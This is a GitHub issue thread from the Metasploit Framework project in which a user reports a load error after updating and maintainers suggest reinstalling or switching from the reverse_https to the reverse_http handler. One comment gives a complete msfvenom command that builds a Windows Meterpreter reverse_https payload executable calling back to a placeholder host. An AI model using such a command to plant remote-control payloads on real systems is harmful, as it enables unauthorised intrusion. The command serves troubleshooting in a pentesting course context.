### ISSUE TITLE
 cannot load such file -- metasm/exe_format/shellcode

### ISSUE THREAD

**Issue by slayerhacker** [rapid7/metasploit-framework#17486]
![Screenshot from 2023-01-17 09-54-06](https://user-images.githubusercontent.com/122613947/212936729-db62ba72-fd98-4cdd-b1ce-ece6630c161b.png)
help me to solve this isses,before it works there is no errors while running these commands but,i updated metasploit after that this error occurs kindly help me....!

**Comment by adfoster-r7** [comment]
Did you update from a very old version of metasploit to a newer version? If so - it may be easier to uninstall and reinstall metasploit

**Comment by adfoster-r7** [comment]
Are you an OSEP student? The reverse_https handler is currently broken with tls1, but it should be be fixed after this PR is complete https://github.com/rapid7/metasploit-framework/issues/17020

As a work around you can apply this fix: https://github.com/rapid7/metasploit-framework/issues/17020

Or use the reverse_http handler instead of reverse_https. If you still have issues, verify your network details are correct

**Comment by 3viLMonk3y** [comment]
You can also add `SSLVERSION=TLS1.2` at the payload creation msfvenom command, and it should work.

Example:
```bash
sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<YOUR IP ADDRESS> LPORT=443 SSLVERSION=TLS1.2 -f exe -o staged.exe
```

**Comment by slayerhacker** [comment]
no i'm not an OSEP student im studying engineering in computer science,and
i'm interested hacking so i used to learn it from demy ,so i theses are the
doubts from that course .and i'll try for http payload , hope it works
,THANK YOU..!

**Comment by adfoster-r7** [comment]
This should be fixed in the latest version of Metasploit
